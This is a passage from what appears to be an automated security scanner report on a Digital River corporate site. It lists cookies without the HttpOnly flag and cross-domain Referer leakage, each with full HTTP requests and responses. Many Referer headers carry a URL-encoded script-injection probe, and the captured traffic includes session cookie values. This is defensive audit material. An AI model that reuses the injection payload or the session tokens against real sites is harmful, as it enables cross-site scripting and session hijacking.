GET /DRHM/Storefront/Site/digriv/pb/images/HomePage/heroButtonComerce.gif HTTP/1.1 Host: corporate.digitalriver.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage?resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1315145806740&da9c3--%3E%3Cscript%3Eprompt(document.location)%3C/script%3Edd29a7ec5c0=1 Cookie: op537homegum=a00602v02x278vq07r1n88278vq08j393ee8a
Response
HTTP/1.1 200 OK Cache-Control: max-age=157788000 Expires: Sun, 14 Feb 2016 05:20:10 GMT ETag: "3aa-4bd96ed0" Content-Type: image/gif Last-Modified: Thu, 29 Apr 2010 11:34:40 GMT Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=3600+360;age=2649;ecid=101169090774,0) Content-Length: 938 Date: Sun, 13 Feb 2011 23:20:10 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc1app57 Accept-Ranges: bytesSet-Cookie: BIGipServerp-drh-dc1pod5-pool1-active=3573678346.260.0000; path=/ GIF89a..........www......NNN......lllbbbXXX..................................................................!.......,...........`..di.h..l..p,.t..v..|....pH,....r.l:...tJ.Z...v..z...xL..&..y.~A$...Q2...[SNIP]...
2.8. http://corporate.digitalriver.com/DRHM/Storefront/Site/digriv/pb/images/HomePage/heroButtonMarketing.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://corporate.digitalriver.com
Path:
/DRHM/Storefront/Site/digriv/pb/images/HomePage/heroButtonMarketing.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerp-drh-dc1pod5-pool1-active=3573678346.260.0000; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /DRHM/Storefront/Site/digriv/pb/images/HomePage/heroButtonMarketing.gif HTTP/1.1 Host: corporate.digitalriver.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage?resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1315145806740&da9c3--%3E%3Cscript%3Eprompt(document.location)%3C/script%3Edd29a7ec5c0=1 Cookie: op537homegum=a00602v02x278vq07r1n88278vq08j393ee8a
Response
HTTP/1.1 200 OK Cache-Control: max-age=157788000 Expires: Sun, 14 Feb 2016 05:20:10 GMT ETag: "3d2-4bd96edf" Content-Type: image/gif Last-Modified: Thu, 29 Apr 2010 11:34:55 GMT Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=3600+360;age=2650;ecid=101169091722,0) Content-Length: 978 Date: Sun, 13 Feb 2011 23:20:10 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc1app57 Accept-Ranges: bytesSet-Cookie: BIGipServerp-drh-dc1pod5-pool1-active=3573678346.260.0000; path=/ GIF89a..........www......NNNlllbbb......XXX..................................................................!.......,...........`..di.h..l..p,.t..v..|....pH,....r.l:...tJ.Z...v..z...xL..&..y.~A$...Q:...[SNIP]...
2.9. http://corporate.digitalriver.com/DRHM/Storefront/Site/digriv/pb/images/HomePage/heroButtonPayment2.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://corporate.digitalriver.com
Path:
/DRHM/Storefront/Site/digriv/pb/images/HomePage/heroButtonPayment2.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerp-drh-dc1pod5-pool1-active=3523346698.260.0000; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /DRHM/Storefront/Site/digriv/pb/images/HomePage/heroButtonPayment2.gif HTTP/1.1 Host: corporate.digitalriver.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage?resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1315145806740&da9c3--%3E%3Cscript%3Eprompt(document.location)%3C/script%3Edd29a7ec5c0=1 Cookie: op537homegum=a00602v02x278vq07r1n88278vq08j393ee8a
Response
HTTP/1.1 200 OK Cache-Control: max-age=157788000 Expires: Thu, 28 Jul 2016 05:25:44 GMT ETag: "410-4c602852" Content-Type: image/gif Last-Modified: Mon, 09 Aug 2010 16:09:54 GMT Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (G;max-age=3600+360;age=0;ecid=23859680048,0) Content-Length: 1040 Date: Thu, 28 Jul 2011 23:25:44 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc1app54 Accept-Ranges: bytesSet-Cookie: BIGipServerp-drh-dc1pod5-pool1-active=3523346698.260.0000; path=/ GIF89a..........wwwccc......lll...bbbNNNXXX...................................................~~~............uuu...........................................................................................[SNIP]...
2.10. http://corporate.digitalriver.com/DRHM/Storefront/Site/digriv/pb/images/HomePage/software.jpg
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://corporate.digitalriver.com
Path:
/DRHM/Storefront/Site/digriv/pb/images/HomePage/software.jpg
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerp-drh-dc1pod5-pool1-active=1224868106.260.0000; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /DRHM/Storefront/Site/digriv/pb/images/HomePage/software.jpg HTTP/1.1 Host: corporate.digitalriver.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage?resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1315145806740&da9c3--%3E%3Cscript%3Eprompt(document.location)%3C/script%3Edd29a7ec5c0=1 Cookie: op537homegum=a00602v02x278vq07r1n88278vq08j393ee8a
Response
HTTP/1.1 200 OK Cache-Control: max-age=157788000 Expires: Thu, 26 May 2016 01:50:44 GMT ETag: "3139-4bd96deb" Content-Type: image/jpeg Last-Modified: Thu, 29 Apr 2010 11:30:51 GMT Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=3600+360;age=2986;ecid=135528829764,0) Content-Length: 12601 Date: Thu, 26 May 2011 19:50:44 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc1app58 Accept-Ranges: bytesSet-Cookie: BIGipServerp-drh-dc1pod5-pool1-active=1224868106.260.0000; path=/ ......JFIF.....d.d......Ducky.......d.....&Adobe.d........... ...C......!...17............................................................................................................................[SNIP]...
2.11. http://corporate.digitalriver.com/DRHM/Storefront/Site/driv/cm/multimedia/homepage_09Oct07/flashV2/jquery-1.3.2.min.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://corporate.digitalriver.com
Path:
/DRHM/Storefront/Site/driv/cm/multimedia/homepage_09Oct07/flashV2/jquery-1.3.2.min.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerp-drh-dc1pod5-pool1-active=3288465674.260.0000; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /DRHM/Storefront/Site/driv/cm/multimedia/homepage_09Oct07/flashV2/jquery-1.3.2.min.js HTTP/1.1 Host: corporate.digitalriver.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage?resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1315145806740&da9c3--%3E%3Cscript%3Eprompt(document.location)%3C/script%3Edd29a7ec5c0=1 Cookie: op537homegum=a00602v02x278vq07r1n88278vq08j393ee8a
Response
HTTP/1.1 200 OK Cache-Control: max-age=157788000 Expires: Tue, 16 Aug 2016 01:32:35 GMT ETag: "dfa6-4acf682f" Content-Type: application/x-javascript Last-Modified: Fri, 09 Oct 2009 16:43:27 GMT Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=7200+0;age=4667;ecid=135528826735,0) Content-Length: 57254 Date: Tue, 16 Aug 2011 19:32:35 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc1app52 Accept-Ranges: bytesSet-Cookie: BIGipServerp-drh-dc1pod5-pool1-active=3288465674.260.0000; path=/ /* * jQuery JavaScript Library v1.3.2 * http://jquery.com/ * * Copyright (c) 2009 John Resig * Dual licensed under the MIT and GPL licenses. * http://docs.jquery.com/License * * Date: 2009-02-...[SNIP]...
2.12. http://corporate.digitalriver.com/DRHM/Storefront/Site/driv/cm/multimedia/homepage_09Oct07/flashV2/jquery.easing.1.3.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://corporate.digitalriver.com
Path:
/DRHM/Storefront/Site/driv/cm/multimedia/homepage_09Oct07/flashV2/jquery.easing.1.3.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerp-drh-dc1pod5-pool1-active=1241645322.260.0000; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /DRHM/Storefront/Site/driv/cm/multimedia/homepage_09Oct07/flashV2/jquery.easing.1.3.js HTTP/1.1 Host: corporate.digitalriver.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage?resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1315145806740&da9c3--%3E%3Cscript%3Eprompt(document.location)%3C/script%3Edd29a7ec5c0=1 Cookie: op537homegum=a00602v02x278vq07r1n88278vq08j393ee8a
Response
HTTP/1.1 200 OK Cache-Control: max-age=157788000 Expires: Wed, 10 Aug 2016 07:26:18 GMT ETag: "1fa1-4acf682f" Content-Type: application/x-javascript Last-Modified: Fri, 09 Oct 2009 16:43:27 GMT Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=7200+0;age=6443;ecid=23859680067,0) Content-Length: 8097 Date: Thu, 11 Aug 2011 01:26:18 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc1app59 Accept-Ranges: bytesSet-Cookie: BIGipServerp-drh-dc1pod5-pool1-active=1241645322.260.0000; path=/ /* * jQuery Easing v1.3 - http://gsgd.co.uk/sandbox/jquery/easing/ * * Uses the built in easing capabilities added In jQuery 1.1 * to offer multiple easing options * * TERMS OF USE - jQuery Easi...[SNIP]...
2.13. http://corporate.digitalriver.com/DRHM/Storefront/Site/driv/cm/multimedia/homepage_09Oct07/flashV2/jquery.fancybox-1.2.1.pack.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://corporate.digitalriver.com
Path:
/DRHM/Storefront/Site/driv/cm/multimedia/homepage_09Oct07/flashV2/jquery.fancybox-1.2.1.pack.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerp-drh-dc1pod5-pool1-active=3523346698.260.0000; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /DRHM/Storefront/Site/driv/cm/multimedia/homepage_09Oct07/flashV2/jquery.fancybox-1.2.1.pack.js HTTP/1.1 Host: corporate.digitalriver.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage?resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1315145806740&da9c3--%3E%3Cscript%3Eprompt(document.location)%3C/script%3Edd29a7ec5c0=1 Cookie: op537homegum=a00602v02x278vq07r1n88278vq08j393ee8a
Response
HTTP/1.1 200 OK Cache-Control: max-age=157788000 Expires: Thu, 28 Jul 2016 05:25:44 GMT ETag: "206f-4acf682f" Content-Type: application/x-javascript Last-Modified: Fri, 09 Oct 2009 16:43:27 GMT Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=7200+0;age=2758;ecid=23859677436,0) Content-Length: 8303 Date: Thu, 28 Jul 2011 23:25:44 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc1app54 Accept-Ranges: bytesSet-Cookie: BIGipServerp-drh-dc1pod5-pool1-active=3523346698.260.0000; path=/ /* * FancyBox - simple and fancy jQuery plugin * Examples and documentation at: http://fancy.klade.lv/ * Version: 1.2.1 (13/03/2009) * Copyright (c) 2009 Janis Skarnelis * Licensed under the MIT ...[SNIP]...
2.14. http://corporate.digitalriver.com/DRHM/Storefront/Site/driv/cm/multimedia/homepage_09Oct07/flashV2/jquery.fancybox.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://corporate.digitalriver.com
Path:
/DRHM/Storefront/Site/driv/cm/multimedia/homepage_09Oct07/flashV2/jquery.fancybox.css
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerp-drh-dc1pod5-pool1-active=3254911242.260.0000; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /DRHM/Storefront/Site/driv/cm/multimedia/homepage_09Oct07/flashV2/jquery.fancybox.css HTTP/1.1 Host: corporate.digitalriver.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage?resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1315145806740&da9c3--%3E%3Cscript%3Eprompt(document.location)%3C/script%3Edd29a7ec5c0=1 Cookie: op537homegum=a00602v02x278vq07r1n88278vq08j393ee8a
Response
HTTP/1.1 200 OK Cache-Control: max-age=157788000 Expires: Wed, 20 Apr 2016 13:06:59 GMT ETag: "1722-4acf682f" Content-Type: text/css Last-Modified: Fri, 09 Oct 2009 16:43:27 GMT Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=7200+0;age=2882;ecid=101169082540,0) Content-Length: 5922 Date: Thu, 21 Apr 2011 07:06:59 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc1app50 Accept-Ranges: bytesSet-Cookie: BIGipServerp-drh-dc1pod5-pool1-active=3254911242.260.0000; path=/ html, body { height: 100%; } div#fancy_overlay { position: absolute; top: 0; left: 0; width:920px; height: 500px; background-color: #666; display: none; z-index: 30; } div#fancy_wrap { tex...[SNIP]...
2.15. http://corporate.digitalriver.com/DRHM/Storefront/Site/driv/cm/multimedia/homepage_09Oct07/flashV2/swfobject.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://corporate.digitalriver.com
Path:
/DRHM/Storefront/Site/driv/cm/multimedia/homepage_09Oct07/flashV2/swfobject.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerp-drh-dc1pod5-pool1-active=1224868106.260.0000; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /DRHM/Storefront/Site/driv/cm/multimedia/homepage_09Oct07/flashV2/swfobject.js HTTP/1.1 Host: corporate.digitalriver.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage?resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1315145806740&da9c3--%3E%3Cscript%3Eprompt(document.location)%3C/script%3Edd29a7ec5c0=1 Cookie: op537homegum=a00602v02x278vq07r1n88278vq08j393ee8a
Response
HTTP/1.1 200 OK Cache-Control: max-age=157788000 Expires: Thu, 26 May 2016 01:50:40 GMT ETag: "27ec-4acf63de" Content-Type: application/x-javascript Last-Modified: Fri, 09 Oct 2009 16:25:02 GMT Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=7200+0;age=634;ecid=135528826721,0) Content-Length: 10220 Date: Thu, 26 May 2011 19:50:40 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc1app58 Accept-Ranges: bytesSet-Cookie: BIGipServerp-drh-dc1pod5-pool1-active=1224868106.260.0000; path=/ /* SWFObject v2.2 <http://code.google.com/p/swfobject/> is released under the MIT License <http://www.opensource.org/licenses/mit-license.php> */ var swfobject=function(){var D="undefined",r="objec...[SNIP]...
2.16. http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://corporate.digitalriver.com
Path:
/store/digriv/html/pbPage.Homepage
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:VISITOR_ID=971D4E8DFAED43674226FBB5874B1E2464458604C3469C26; expires=Mon, 03-Sep-2012 20:05:58 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /store/digriv/html/pbPage.Homepage HTTP/1.1 Host: corporate.digitalriver.com Proxy-Connection: keep-alive Referer: http://corporate.digitalriver.com/store/driv/en_US/ContentTheme/pbPage.Homepage/sectionName.home User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op646kaspersky_us_storepageliid=a01603h0892794r05t3df82794r05y3aoe389; ORA_WX_SESSION="10.1.2.197:260-0#0"; JSESSIONID=FDCBEABE0227856E4B45473D1B48DB8F; VISITOR_ID=971D4E8DFAED43674226FBB5874B1E2464458604C3469C26; BIGipServerp-drh-dc1pod5-pool1-active=3305242890.260.0000; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; op393dr_homepage_demoliid=a04006j09d2794r06b26c1afe; fcOOS=fcOptOutChip=undefined; fcP=C=0&T=1315145843991&DTO=1315145843969&U=708273219&V=1315145843969; fcR=http%3A//www.digitalriver.com/; fcPT=http%3A//corporate.digitalriver.com/store/driv/en_US/ContentTheme/pbPage.Homepage/sectionName.home; fcC=X=C708273219&Y=1315145843991&FV=10&H=1315145843969&fcTHR=www.digitalriver.com}www.drcorporate.com,store.digitalriver.com}www.store-dr.com&Z=0&E=5035601&F=0&I=1315145844054
Response
HTTP/1.1 301 Moved Permanently Location: http://reservoir.marketstudio.net/reservoir?d=http%3A%2F%2Fcorporate.digitalriver.com%2Fstore%2Fdigriv%2Fhtml%2FpbPage.Homepage%3Fresid%3D__RESID__%26rests%3D1315145806740&t=commerce&p=globalcommerce&p1=digriv&p2=38938839926&p3=newsession Content-Type: text/plainSet-Cookie: VISITOR_ID=971D4E8DFAED43674226FBB5874B1E2464458604C3469C26; expires=Mon, 03-Sep-2012 20:05:58 GMT; path=/ Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=126938593912,0) Content-Length: 0 Date: Sun, 04 Sep 2011 14:16:46 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc1app53
3. Cross-domain Referer leakage
previous
next
There are 2 instances of this issue:
Issue background
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form. If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise. You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application. Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure. Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
3.1. http://corporate.digitalriver.com/store
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://corporate.digitalriver.com
Path:
/store
Issue detail
The page was loaded from a URL containing a query string:http://corporate.digitalriver.com/store?Action=DisplayProductSearchResultsPage&SiteID=digriv&Locale=en_US&ThemeID=16015700&CallingPageID=CorpPage&keywords=xss&x=0&y=0 The response contains the following links to other domains:http://phx.corporate-ir.net/phoenix.zhtml?c=94762&p=irol-irhome http://t2.trackalyzer.com/trackalyze.js http://www.twitter.com/digitalriverinc https://cm.commerce5.com/ https://cp.element5.com/
Request
GET /store?Action=DisplayProductSearchResultsPage&SiteID=digriv&Locale=en_US&ThemeID=16015700&CallingPageID=CorpPage&keywords=xss&x=0&y=0 HTTP/1.1 Host: corporate.digitalriver.com Proxy-Connection: keep-alive Referer: http://corporate.digitalriver.com/store/digriv/Corp/sectionName.company/subSectionName.aboutUs/page.aboutUs User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op646kaspersky_us_storepageliid=a01603h0892794r05t3df82794r05y3aoe389; ORA_WX_SESSION="10.1.2.197:260-0#0"; JSESSIONID=FDCBEABE0227856E4B45473D1B48DB8F; BIGipServerp-drh-dc1pod5-pool1-active=3305242890.260.0000; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; op393dr_homepage_demoliid=a04006j09d2794r06b26c1afe; fcOOS=fcOptOutChip=undefined; fcR=http%3A//www.digitalriver.com/; VISITOR_ID=971D4E8DFAED43674226FBB5874B1E2464458604C3469C26; op393dr_homepage_demo1gum=a04e07i0a12794q0643tzdbaf; op393dr_homepage_demo1liid=a04e07i0a12794q0643tzdbaf; __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmb=94877326.3.10.1315145846; __utmc=94877326; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmb=94877326.3.10.1315145846; __utmc=94877326; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fcP=C=0&T=1315145843991&DTO=1315145843969&U=708273219&V=1315145926231; fcPT=http%3A//corporate.digitalriver.com/store/digriv/Corp/sectionName.company/subSectionName.aboutUs/page.aboutUs; fcC=X=C708273219&Y=1315145926358&FV=10&H=1315145926231&fcTHR=www.digitalriver.com}www.drcorporate.com,store.digitalriver.com}www.store-dr.com&Z=2&E=201359&F=0&I=1315145947293
Response
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=135528635791,0) Date: Sun, 04 Sep 2011 14:18:31 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc1app53 Content-Length: 48013 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit...[SNIP]... <li><a href="https://cm.commerce5.com"> Commerce Manager</a>...[SNIP]... <li><a href="https://cp.element5.com"> element 5</a>...[SNIP]... <div id="headTwitter"><a id="twitter" href="http://www.twitter.com/digitalriverinc" target="_blank"> <img alt="Twitter" title="Twitter" src="/DRHM/Storefront/Site/digriv/cm/images/little_twit_icon.gif" />...[SNIP]... <li> <a href="http://phx.corporate-ir.net/phoenix.zhtml?c=94762&p=irol-irhome" onmouseover="showSubNavContent(3,5);"> Investor Relations</a>...[SNIP]... </script> <script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"> </script>...[SNIP]...
3.2. http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://corporate.digitalriver.com
Path:
/store/digriv/html/pbPage.Homepage
Issue detail
The page was loaded from a URL containing a query string:http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage?resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1315145806740 The response contains the following links to other domains:http://bcove.me/phdjojzi http://phx.corporate-ir.net/phoenix.zhtml?c=94762&p=irol-irhome http://t2.trackalyzer.com/trackalyze.js http://www.goglobalocity.com/ http://www.twitter.com/digitalriverinc https://cm.commerce5.com/ https://cp.element5.com/
Request
GET /store/digriv/html/pbPage.Homepage?resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1315145806740 HTTP/1.1 Host: corporate.digitalriver.com Proxy-Connection: keep-alive Referer: http://corporate.digitalriver.com/store/driv/en_US/ContentTheme/pbPage.Homepage/sectionName.home User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op646kaspersky_us_storepageliid=a01603h0892794r05t3df82794r05y3aoe389; ORA_WX_SESSION="10.1.2.197:260-0#0"; JSESSIONID=FDCBEABE0227856E4B45473D1B48DB8F; BIGipServerp-drh-dc1pod5-pool1-active=3305242890.260.0000; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; op393dr_homepage_demoliid=a04006j09d2794r06b26c1afe; 